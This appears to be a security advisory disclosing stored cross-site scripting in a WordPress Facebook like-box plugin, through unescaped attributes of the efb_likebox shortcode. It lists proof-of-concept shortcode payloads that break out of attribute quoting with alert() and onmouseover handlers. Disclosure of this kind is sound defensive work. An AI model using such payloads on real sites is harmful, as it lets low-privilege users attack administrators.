Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin
Attributes fb_appid and locale (fixed in 6.5.4):
[efb_likebox fb_appid='1234"; alert(/fb_appid/); asd ="' locale='1234"; alert(/locale/); asd ="']
Attribute animate_effect:
[efb_likebox animate_effect='1234" onmouseover="alert(/animate_effect/)" style="height: 50px; border-style: solid" "']
Attribute fanpage_url:
[efb_likebox fanpage_url='http://example.com/awesome/page/" onmouseover=alert("fanpage_url") style="height: 50px; border-style: solid" "']
Attribute box_width:
[efb_likebox box_width='1234" onmouseover="alert(/box_width/)" style="height: 50px; border-style: solid" "']
Attribute box_height:
[efb_likebox box_height='1234" onmouseover="alert(/box_height/)" style="height: 50px; border-style: solid" "']